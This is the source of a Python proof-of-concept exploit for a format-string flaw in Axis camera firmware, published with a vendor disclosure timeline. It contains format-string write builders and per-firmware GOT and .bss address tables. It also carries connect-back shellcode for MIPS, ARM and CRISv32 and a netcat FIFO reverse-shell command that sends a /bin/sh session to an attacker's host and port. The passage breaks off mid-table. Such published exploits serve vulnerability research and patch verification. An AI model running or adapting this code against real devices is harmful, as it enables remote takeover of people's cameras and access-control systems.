Q1604, Q1614, Q1615, Q1635, Q1635-E,\r\n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,\r\n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,\r\n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,\r\n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,\r\n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,\r\n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,\r\n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,\r\n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,\r\n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,\r\n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more\r\n#\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n#\r\n# Firmware versions vulnerable to the SSI FMS exploit\r\n#\r\n# ('V.Vx' == The FMS key used in this exploit)\r\n#\r\n# Firmware\tIntroduced\tCRISv32\t\tMIPS\t\tARM (no exec heap from >5.20.x)\r\n# 5.00.x\t2008\t\t-\t\t-\t\tno\r\n# 5.01.x\t2008\t\tno\t\t-\t\tno\r\n# 5.02.x\t2008\t\tno\t\t-\t\t-\r\n# 5.05.x\t2009\t\tno\t\t-\t\t-\r\n# 5.06.x\t2009\t\tno\t\t-\t\t-\r\n# 5.07.x\t2009\t\tno\t\t-\t\tno\r\n# 5.08.x\t2010\t\tno\t\t-\t\t-\r\n# 5.09.x\t2010\t\tno\t\t-\t\t-\r\n# 5.10.x\t2009\t\tno\t\t-\t\t-\r\n# 5.11.x\t2010\t\tno\t\t-\t\t-\r\n# 5.12.x\t2010\t\tno\t\t-\t\t-\r\n# 5.15.x\t2010\t\tno\t\t-\t\t-\r\n# 5.16.x\t2010\t\tno\t\t-\t\t-\r\n# 5.20.x\t2010-2011\t5.2x\t\t-\t\t5.2x\r\n# 5.21.x\t2011\t\t5.2x\t\t-\t\t5.2x\r\n# 5.22.x\t2011\t\t5.2x\t\t-\t\t-\r\n# 5.25.x\t2011\t\t5.2x\t\t-\t\t-\r\n# 5.40.x\t2011\t\t5.4x\t\t5.4x\t\t5.4x\r\n# 5.41.x\t2012\t\t5.4x\t\t-\t\t-\r\n# 5.50.x\t2013\t\t5.5x\t\t5.5x\t\t5.4x\r\n# 5.51.x\t2013\t\t-\t\t5.4x\t\t-\r\n# 5.55.x\t2013\t\t-\t\t5.5x\t\t5.5x\r\n# 5.60.x\t2014\t\t-\t\t5.6x\t\t5.6x\r\n# 5.65.x\t2014-2015\t-\t\t5.6x\t\t-\r\n# 5.70.x\t2015\t\t-\t\t5.7x\t\t-\r\n# 5.75.x\t2015\t\t-\t\t5.7x\t\t5.7x\r\n# 5.80.x\t2015\t\t-\t\t5.8x\t\t5.8x\r\n# 5.81.x\t2015\t\t-\t\t5.8x\t\t-\r\n# 5.85.x\t2015\t\t-\t\t5.8x\t\t5.8x\r\n# 5.90.x\t2015\t\t-\t\t5.9x\t\t-\r\n# 5.95.x\t2016\t\t-\t\t5.9x\t\t5.8x\r\n# 6.10.x\t2016\t\t-\t\t6.1x\t\t-\r\n# 6.15.x\t2016\t\t-\t\t-\t\t6.1x\r\n# 6.20.x\t2016\t\t-\t\t6.2x\t\t-\r\n#\r\n# Vendor URL's of still supported and affected products\r\n#\r\n# http://www.axis.com/global/en/products/access-control\r\n# http://www.axis.com/global/en/products/video-encoders\r\n# http://www.axis.com/global/en/products/network-cameras\r\n# http://www.axis.com/global/en/products/audio\r\n#\r\n# Axis Product Security\r\n#\r\n# product-security@axis.com\r\n# http://www.axis.com/global/en/support/product-security\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n# http://www.axis.com/global/en/support/faq/FAQ116268\r\n#\r\n# Timetable\r\n#\r\n# - Research and Development: 06/01/2016 - 01/06/2016\r\n# - Sent vulnerability details to vendor: 05/06/2016\r\n# - Vendor responce received: 06/06/2016\r\n# - Vendor ACK of findings received: 07/06/2016\r\n# - Vendor sent verification image: 13/06/2016\r\n# - Confirmed that exploit do not work after vendors correction: 13/06/2016\r\n# - Vendor informed about their service release(s): 29/06/2016\r\n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016\r\n# - Full Disclosure: 18/07/2016\r\n#\r\n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\"\r\n#\r\n# Have a nice day\r\n# /bashis\r\n#\r\n#####################################################################################\r\n\r\nimport sys\r\nimport string\r\nimport socket\r\nimport time\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport re\r\n\r\n\r\nclass do_FMS:\r\n\r\n#\tPOP = \"%8x\"\t\t# Old style POP's with 8 bytes per POP\r\n\tPOP = \"%1c\"\t\t# Old style POP's with 1 byte per POP\r\n\tWRITElln = \"%lln\"\t# Write 8 bytes\r\n\tWRITEn = \"%n\"\t\t# Write 4 bytes\r\n\tWRITEhn = \"%hn\"\t\t# Write 2 bytes\r\n\tWRITEhhn = \"%hhn\"\t# Write 1 byte\r\n\r\n\tdef __init__(self,targetIP,verbose):\r\n\t\tself.targetIP = targetIP\r\n\t\tself.verbose = verbose\r\n\t\tself.fmscode = \"\"\r\n\r\n\t# Mostly used internally in this function\r\n\tdef Add(self, data):\r\n\t\tself.fmscode += data\r\n\r\n\t# 'New Style' Double word (8 bytes)\r\n\tdef AddDirectParameterLLN(self, ADDR):\r\n\t\tself.Add('%')\r\n\t\tself.Add(str(ADDR))\r\n\t\tself.Add('$lln')\r\n\r\n\t# 'New Style' Word (4 bytes)\r\n\tdef AddDirectParameterN(self, ADDR):\r\n\t\tself.Add('%')\r\n\t\tself.Add(str(ADDR))\r\n\t\tself.Add('$n')\r\n\r\n\t# 'New Style' Half word (2 bytes)\r\n\tdef AddDirectParameterHN(self, ADDR):\r\n\t\tself.Add('%')\r\n\t\tself.Add(str(ADDR))\r\n\t\tself.Add('$hn')\r\n\r\n\t# 'New Style' One Byte (1 byte)\r\n\tdef AddDirectParameterHHN(self, ADDR):\r\n\t\tself.Add('%')\r\n\t\tself.Add(str(ADDR))\r\n\t\tself.Add('$hhn')\r\n\r\n\t# Addressing\r\n\tdef AddADDR(self, ADDR):\r\n\t\tself.Add('%')\r\n\t\tself.Add(str(ADDR))\r\n\t\tself.Add('u')\r\n\r\n\t# 'Old Style' POP\r\n\tdef AddPOP(self, size):\r\n\t\tif size != 0:\r\n\t\t\tself.Add(self.POP * size)\r\n\r\n\t# Normally only one will be sent, multiple is good to quick-check for any FMS\r\n\t#\r\n\t# 'Old Style' Double word (8 bytes)\r\n\tdef AddWRITElln(self, size):\r\n\t\t\tself.Add(self.WRITElln * size)\r\n\r\n\t# 'Old Style' Word (4 bytes)\r\n\tdef AddWRITEn(self, size):\r\n\t\t\tself.Add(self.WRITEn * size)\r\n\r\n\t# 'Old Style' Half word (2 bytes)\r\n\tdef AddWRITEhn(self, size):\r\n\t\t\tself.Add(self.WRITEhn * size)\r\n\r\n\t# 'Old Style' One byte (1 byte)\r\n\tdef AddWRITEhhn(self, size):\r\n\t\t\tself.Add(self.WRITEhhn * size)\r\n\r\n\t# Return the whole FMS string\r\n\tdef FMSbuild(self):\r\n\t\treturn self.fmscode\r\n\r\nclass HTTPconnect:\r\n\r\n\tdef __init__(self, host, proto, verbose, creds, noexploit):\r\n\t\tself.host = host\r\n\t\tself.proto = proto\r\n\t\tself.verbose = verbose\r\n\t\tself.credentials = creds\r\n\t\tself.noexploit = noexploit\r\n\t\r\n\t# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc..\r\n\tdef RAW(self, uri):\r\n\t\t# Connect-timeout in seconds\r\n\t\ttimeout = 5\r\n\t\tsocket.setdefaulttimeout(timeout)\r\n\t\t\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ts.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\t\ttmp = self.host.split(':')\r\n\t\tHOST = tmp[0]\r\n\t\tPORT = int(tmp[1])\r\n\t\tif self.verbose:\r\n\t\t\tprint \"[Verbose] Sending to:\", HOST\r\n\t\t\tprint \"[Verbose] Port:\", PORT\r\n\t\t\tprint \"[Verbose] URI:\",uri\r\n\t\ts.connect((HOST, PORT))\r\n\t\ts.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri)\r\n\t\thtml = (s.recv(4096)) # We really do not care whats coming back\r\n#\t\tif html:\r\n#\t\t\tprint \"[i] Received:\",html\r\n\t\ts.shutdown(3)\r\n\t\ts.close()\r\n\t\treturn html\r\n\r\n\r\n\tdef Send(self, uri):\r\n\r\n\t\t# The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually\r\n\t\t# matter for the functionality of this exploit, only for future references.\r\n\t\theaders = { \r\n\t\t\t'User-Agent' : 'MSIE',\r\n\t\t}\r\n\r\n\t\t# Connect-timeout in seconds\r\n\t\ttimeout = 5\r\n\t\tsocket.setdefaulttimeout(timeout)\r\n\r\n\t\turl = '%s://%s%s' % (self.proto, self.host, uri)\r\n\r\n\t\tif self.verbose:\r\n\t\t\tprint \"[Verbose] Sending:\", url\r\n\r\n\t\tif self.proto == 'https':\r\n\t\t\tif hasattr(ssl, '_create_unverified_context'):\r\n\t\t\t\tprint \"[i] Creating SSL Default Context\"\r\n\t\t\t\tssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n\t\tif self.credentials:\r\n\t\t\tBasic_Auth = self.credentials.split(':')\r\n\t\t\tif self.verbose:\r\n\t\t\t\tprint \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1]\r\n\t\t\ttry:\r\n\t\t\t\tpwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n\t\t\t\tpwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n\t\t\t\tauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n\t\t\t\topener = urllib2.build_opener(auth_handler)\r\n\t\t\t\turllib2.install_opener(opener)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint \"[!] Basic Auth Error:\",e\r\n\t\t\t\tsys.exit(1)\r\n\r\n\t\tif self.noexploit and not self.verbose:\r\n\t\t\tprint \"[<] 204 Not Sending!\"\r\n\t\t\thtml = \"Not sending any data\"\r\n\t\telse:\r\n\t\t\tdata = None\r\n\t\t\treq = urllib2.Request(url, data, headers)\r\n\t\t\trsp = urllib2.urlopen(req)\r\n\t\t\tif rsp:\r\n\t\t\t\tprint \"[<] %s OK\" % rsp.code\r\n\t\t\t\thtml = rsp.read()\r\n\t\treturn html\r\n\r\n\r\nclass shellcode_db:\r\n\r\n\tdef __init__(self,targetIP,verbose):\r\n\t\tself.targetIP = targetIP\r\n\t\tself.verbose = verbose\r\n\r\n\tdef sc(self,target):\r\n\t\tself.target = target\r\n\r\n\r\n# Connect back shellcode\r\n#\r\n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\"\r\n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators\r\n# MIPSel: Written by Jacob Holcomb (url encoded by me)\r\n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n#\r\n\t\t# Slightly modified syscall's\r\n\t\tMIPSel = string.join([\r\n\t\t#close stdin\r\n\t\t\"%ff%ff%04%28\" #slti\ta0,zero,-1\r\n\t\t\"%a6%0f%02%24\" #li\tv0,4006\r\n\t\t\"%4c%f7%f7%03\" #syscall\t0xdfdfd\r\n\t\t#close stdout\r\n\t\t\"%11%11%04%28\" #slti\ta0,zero,4369\r\n\t\t\"%a6%0f%02%24\" #li\tv0,4006\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t#close stderr\r\n\t\t\"%fd%ff%0c%24\" #li\tt4,-3\r\n\t\t\"%27%20%80%01\" #nor\ta0,t4,zero\r\n\t\t\"%a6%0f%02%24\" #li\tv0,4006\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t# socket AF_INET (2)\r\n\t\t\"%fd%ff%0c%24\" #li\tt4,-3\r\n\t\t\"%27%20%80%01\" #nor\ta0,t4,zero\r\n\t\t\"%27%28%80%01\" #nor\ta1,t4,zero\r\n\t\t\"%ff%ff%06%28\" #slti\ta2,zero,-1\r\n\t\t\"%57%10%02%24\" #li\tv0,4183\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t#\r\n\t\t\"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF\r\n\t\t#\r\n\t\t# dup2 stdout\r\n\t\t\"%c9%0f%02%24\" #li\tv0,4041\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t#\r\n\t\t# dup2 stderr\r\n\t\t\"%c9%0f%02%24\" #li\tv0,4041\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t#\r\n\t\t# Port\r\n\t\t\"PP1PP0%05%3c\"\r\n\t\t\"%01%ff%a5%34\"\r\n\t\t#\r\n\t\t\"%01%01%a5%20\" #addi\ta1,a1,257\r\n\t\t\"%f8%ff%a5%af\" #sw\ta1,-8(sp)\r\n\t\t#\r\n\t\t# IP\r\n\t\t\"IP3IP4%05%3c\"\r\n\t\t\"IP1IP2%a5%34\"\r\n\t\t#\r\n\t\t\"%fc%ff%a5%af\" #sw\ta1,-4(sp)\r\n\t\t\"%f8%ff%a5%23\" #addi\ta1,sp,-8\r\n\t\t\"%ef%ff%0c%24\" #li\tt4,-17\r\n\t\t\"%27%30%80%01\" #nor\ta2,t4,zero\r\n\t\t\"%4a%10%02%24\" #li\tv0,4170\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t#\r\n\t\t\"%62%69%08%3c\" #lui\tt0,0x6962\r\n\t\t\"%2f%2f%08%35\" #ori\tt0,t0,0x2f2f\r\n\t\t\"%ec%ff%a8%af\" #sw\tt0,-20(sp)\r\n\t\t\"%73%68%08%3c\" #lui\tt0,0x6873\r\n\t\t\"%6e%2f%08%35\" #ori\tt0,t0,0x2f6e\r\n\t\t\"%f0%ff%a8%af\" #sw\tt0,-16(sp\r\n\t\t\"%ff%ff%07%28\" #slti\ta3,zero,-1\r\n\t\t\"%f4%ff%a7%af\" #sw\ta3,-12(sp)\r\n\t\t\"%fc%ff%a7%af\" #sw\ta3,-4(sp\r\n\t\t\"%ec%ff%a4%23\" #addi\ta0,sp,-20\r\n\t\t\"%ec%ff%a8%23\" #addi\tt0,sp,-20\r\n\t\t\"%f8%ff%a8%af\" #sw\tt0,-8(sp)\r\n\t\t\"%f8%ff%a5%23\" #addi\ta1,sp,-8\r\n\t\t\"%ec%ff%bd%27\" #addiu\tsp,sp,-20\r\n\t\t\"%ff%ff%06%28\" #slti\ta2,zero,-1\r\n\t\t\"%ab%0f%02%24\" #li\tv0,4011 (execve)\r\n\t\t\"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n\t\t], '')\t\r\n\r\n\t\t# Working netcat shell\r\n\t\t# - $PATH will locate 'mkfifo', 'nc' and 'rm'\r\n\t\t# - LHOST / LPORT will be changed on the fly later in the code\r\n\t\t# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting\r\n\t\t# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]\r\n\t\t# $ echo -n \"$IFS\" | hexdump -C\r\n\t\t# 00000000 20 09 0a\r\n\t\t# - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c]\r\n\t\t#\r\n\t\t# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator\r\n\t\t#\r\n\t\t# Working with Apache and Boa\r\n#\t\tNCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n\t\tNCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n\r\n\t\tARMel = string.join([\r\n\t\t# original: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n\t\t# 32-bit instructions, enter thumb mode\r\n\t\t\"%01%10%8f%e2\"\t# add r1, pc, #1\r\n\t\t\"%11%ff%2f%e1\"\t# bx r1\r\n\r\n\t\t# 16-bit thumb instructions follow\r\n\t\t#\r\n\t\t# socket(2, 1, 0)\r\n\t\t\"%02%20\"\t#mov r0, #2\r\n\t\t\"%01%21\"\t#mov r1, #1\r\n\t\t\"%92%1a\"\t#sub r2, r2, r2\r\n\t\t\"%0f%02\"\t#lsl r7, r1, #8\r\n\t\t\"%19%37\"\t#add r7, r7, #25\r\n\t\t\"%01%df\"\t#svc 1\r\n\t\t#\r\n\t\t# connect(r0, &addr, 16)\r\n\t\t\"%06%1c\"\t#mov r6, r0\r\n\t\t\"%08%a1\"\t#add r1, pc, #32\r\n\t\t\"%10%22\"\t#mov r2, #16\r\n\t\t\"%02%37\"\t#add r7, #2\r\n\t\t\"%01%df\"\t#svc 1\r\n\t\t#\r\n\t\t# dup2(r0, 0/1/2)\r\n\t\t\"%3f%27\"\t#mov r7, #63\r\n\t\t\"%02%21\"\t#mov r1, #2\r\n\t\t#\r\n\t\t#lb:\r\n\t\t\"%30%1c\"\t#mov r0, r6\r\n\t\t\"%01%df\"\t#svc 1\r\n\t\t\"%01%39\"\t#sub r1, #1\r\n\t\t\"%fb%d5\"\t#bpl lb\r\n\t\t#\r\n\t\t# execve(\"/bin/sh\", [\"/bin/sh\", 0], 0)\r\n\t\t\"%05%a0\"\t#add r0, pc, #20\r\n\t\t\"%92%1a\"\t#sub r2, r2, r2\r\n\t\t\"%05%b4\"\t#push {r0, r2}\r\n\t\t\"%69%46\"\t#mov r1, sp\r\n\t\t\"%0b%27\"\t#mov r7, #11\r\n\t\t\"%01%df\"\t#svc 1\r\n\t\t#\r\n\t\t\"%c0%46\"\t# .align 2 (NOP)\r\n\t\t\"%02%00\"\t# .short 0x2\t\t(struct sockaddr)\r\n\t\t\"PP1PP0\"\t# .short 0x3412\t\t(port: 0x1234)\r\n\t\t\"IP1IP2IP3IP4\"\t#.byte 192,168,57,1\t(ip: 192.168.57.1)\r\n\t\t# .ascii \"/bin/sh\\0\\0\"\r\n\t\t\"%2f%62%69%6e\"\t# /bin\r\n\t\t\"%2f%73%68%00%00\"\t# /sh\\x00\\x00\r\n\t\t\"%00%00%00%00\"\r\n\t\t\"%c0%46\"\r\n\t\t], '')\t\r\n\r\n\r\n\t\t# Connect-back shell for Axis CRISv32\r\n\t\t# Written by mcw noemail eu 2016\r\n\t\t#\r\n\t\tCRISv32 = string.join([\r\n\t\t#close(0)\r\n\t\t\"%7a%86\"\t\t# clear.d r10 \r\n\t\t\"%5f%9c%06%00\"\t\t# movu.w 0x6,r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#close(1)\r\n\t\t\"%41%a2\"\t\t# moveq 1,r10\r\n\t\t\"%5f%9c%06%00\"\t\t# movu.w 0x6,r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#close(2)\r\n\t\t\"%42%a2\"\t\t# moveq 2,r10\r\n\t\t\"%5f%9c%06%00\"\t\t# movu.w 0x6,r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#\r\n\t\t\"%10%e1\"\t\t# addoq 16,sp,acr\r\n\t\t\"%42%92\"\t\t# moveq 2,r9\r\n\t\t\"%df%9b\"\t\t# move.w r9,[acr]\r\n\t\t\"%10%e1\"\t\t# addoq 16,sp,acr\r\n\t\t\"%02%f2\"\t\t# addq 2,acr\r\n\t\t#PORT\r\n\t\t\"%5f%9ePP1PP0\"\t\t# move.w 0xPP1PP0,r9 #\r\n\t\t\"%df%9b\"\t\t# move.w r9,[acr]\r\n\t\t\"%10%e1\"\t\t# addoq 16,sp,acr\r\n\t\t\"%6f%96\"\t\t# move.d acr,r9\r\n\t\t\"%04%92\"\t\t# addq 4,r9\r\n\t\t#IP\r\n\t\t\"%6f%feIP1IP2IP3IP4\"\t# move.d IP4IP3IP2IP1,acr\r\n\t\t\"%e9%fb\"\t\t# move.d acr,[r9]\r\n\t\t#\r\n\t\t#socket()\r\n\t\t\"%42%a2\"\t\t# moveq 2,r10\r\n\t\t\"%41%b2\"\t\t# moveq 1,r11\r\n\t\t\"%7c%86\"\t\t# clear.d r12\r\n\t\t\"%6e%96\"\t\t# move.d $sp,$r9\r\n\t\t\"%e9%af\"\t\t# move.d $r10,[$r9+]\r\n\t\t\"%e9%bf\"\t\t# move.d $r11,[$r9+]\r\n\t\t\"%e9%cf\"\t\t# move.d $r12,[$r9+]\r\n\t\t\"%41%a2\"\t\t# moveq 1,$r10\r\n\t\t\"%6e%b6\"\t\t# move.d $sp,$r11\r\n\t\t\"%5f%9c%66%00\"\t\t# movu.w 0x66,$r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#\r\n\t\t\"%6a%96\"\t\t# move.d $r10,$r9\r\n\t\t\"%0c%e1\"\t\t# addoq 12,$sp,$acr\r\n\t\t\"%ef%9b\"\t\t# move.d $r9,[$acr]\r\n\t\t\"%0c%e1\"\t\t# addoq 12,$sp,$acr\r\n\t\t\"%6e%96\"\t\t# move.d $sp,$r9\r\n\t\t\"%10%92\"\t\t# addq 16,$r9\r\n\t\t\"%6f%aa\"\t\t# move.d [$acr],$r10\r\n\t\t\"%69%b6\"\t\t# move.d $r9,$r11\r\n\t\t\"%50%c2\"\t\t# moveq 16,$r12\r\n\t\t#\r\n\t\t# connect()\r\n\t\t\"%6e%96\"\t\t# move.d $sp,$r9\r\n\t\t\"%e9%af\"\t\t# move.d $r10,[$r9+]\r\n\t\t\"%e9%bf\"\t\t# move.d $r11,[$r9+]\r\n\t\t\"%e9%cf\"\t\t# move.d $r12,[$r9+]\r\n\t\t\"%43%a2\"\t\t# moveq 3,$r10\r\n\t\t\"%6e%b6\"\t\t# move.d $sp,$r11\r\n\t\t\"%5f%9c%66%00\"\t\t# movu.w 0x66,$r9 \r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t# dup(0) already in socket\r\n\t\t#dup(1)\r\n\t\t\"%6f%aa\"\t\t# move.d [$acr],$r10\r\n\t\t\"%41%b2\"\t\t# moveq 1,$r11\r\n\t\t\"%5f%9c%3f%00\"\t\t# movu.w 0x3f,$r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#\r\n\t\t#dup(2)\r\n\t\t\"%6f%aa\"\t\t# move.d [$acr],$r10\r\n\t\t\"%42%b2\"\t\t# moveq 2,$r11\r\n\t\t\"%5f%9c%3f%00\"\t\t# movu.w 0x3f,$r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t#\r\n\t\t#execve(\"/bin/sh\",NULL,NULL)\r\n\t\t\"%90%e2\"\t\t# subq 16,$sp\r\n\t\t\"%6e%96\"\t\t# move.d $sp,$r9\r\n\t\t\"%6e%a6\"\t\t# move.d $sp,$10\r\n\t\t\"%6f%0e%2f%2f%62%69\"\t# move.d 69622f2f,$r0\r\n\t\t\"%e9%0b\"\t\t# move.d $r0,[$r9]\r\n\t\t\"%04%92\"\t\t# addq 4,$r9\r\n\t\t\"%6f%0e%6e%2f%73%68\"\t# move.d 68732f6e,$r0\r\n\t\t\"%e9%0b\"\t\t# move.d $r0,[$r9]\r\n\t\t\"%04%92\"\t\t# addq 4,$r9\r\n\t\t\"%79%8a\"\t\t# clear.d [$r9]\r\n\t\t\"%04%92\"\t\t# addq 4,$r9\r\n\t\t\"%79%8a\"\t\t# clear.d [$r9]\r\n\t\t\"%04%92\"\t\t# addq 4,$r9\r\n\t\t\"%e9%ab\"\t\t# move.d $r10,[$r9]\r\n\t\t\"%04%92\"\t\t# addq 4,$r9\r\n\t\t\"%79%8a\"\t\t# clear.d [$r9]\r\n\t\t\"%10%e2\"\t\t# addq 16,$sp\r\n\t\t\"%6e%f6\"\t\t# move.d $sp,$acr\r\n\t\t\"%6e%96\"\t\t# move.d $sp,$r9\r\n\t\t\"%6e%b6\"\t\t# move.d $sp,$r11\r\n\t\t\"%7c%86\"\t\t# clear.d $r12\r\n\t\t\"%4b%92\"\t\t# moveq 11,$r9\r\n\t\t\"%3d%e9\"\t\t# break 13\r\n\t\t\t], '')\t\r\n\r\n\r\n\t\tif self.target == 'MIPSel':\r\n\t\t\treturn MIPSel\r\n\t\telif self.target == 'ARMel':\r\n\t\t\treturn ARMel\r\n\t\telif self.target == 'CRISv32':\r\n\t\t\treturn CRISv32\r\n\t\telif self.target == 'NCSH1':\r\n\t\t\treturn NCSH\r\n\t\telif self.target == 'NCSH2':\r\n\t\t\treturn NCSH\r\n\t\telse:\r\n\t\t\tprint \"[!] Unknown shellcode! (%s)\" % str(self.target)\r\n\t\t\tsys.exit(1)\r\n\r\n\r\nclass FMSdb:\r\n\r\n\tdef __init__(self,targetIP,verbose):\r\n\t\tself.targetIP = targetIP\r\n\t\tself.verbose = verbose\r\n\r\n\tdef FMSkey(self,target):\r\n\t\tself.target = target\r\n\r\n\t\ttarget_db = {\r\n\r\n#-----------------------------------------------------------------------\r\n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)\r\n#-----------------------------------------------------------------------\r\n\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n\t\t# MPQT\r\n\t\t'MIPS-5.85.x':\t [\r\n\t\t\t\t0x41f370,\t# Adjust to GOT free() address\r\n\t\t\t\t0x420900,\t# .bss shellcode address\r\n\t\t\t\t2,\t\t# 1st POP's\r\n\t\t\t\t2,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.40.3': [\r\n\t\t\t\t0x41e41c,\t# Adjust to GOT free() address\r\n\t\t\t\t0x4208cc,\t# .bss shellcode address\r\n\t\t\t\t7,\t\t# 1st POP's\r\n\t\t\t\t11,\t\t# 2nd POP's\r\n\t\t\t\t'ax',\t\t# Aligns injected code\r\n\t\t\t\t450,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.4x': [\t\r\n\t\t\t\t0x41e4cc,\t# Adjust to GOT free() address\r\n\t\t\t\t0x42097c,\t# .bss shellcode address\r\n\t\t\t\t7,\t\t# 1st POP's\r\n\t\t\t\t11,\t\t# 2nd POP's\r\n\t\t\t\t'ax',\t\t# Aligns injected code\r\n\t\t\t\t450,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.5x': [\r\n\t\t\t\t0x41d11c,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41f728,\t# .bss shellcode address\r\n\t\t\t\t5,\t\t# 1st POP's\r\n\t\t\t\t15,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.55x': [\t\r\n\t\t\t\t0x41d11c,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41f728,\t# .bss shellcode address\r\n\t\t\t\t11,\t\t# 1st POP's\r\n\t\t\t\t9,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# Shared with MPQT and PACS\r\n\t\t'MIPS-5.6x': [\t\r\n\t\t\t\t0x41d048,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41f728,\t# .bss shellcode address\r\n\t\t\t\t5,\t\t# 1st POP's\r\n\t\t\t\t15,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.7x': [\t\r\n\t\t\t\t0x41d04c,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41f718,\t# .bss shellcode address\r\n\t\t\t\t2,\t\t# 1st 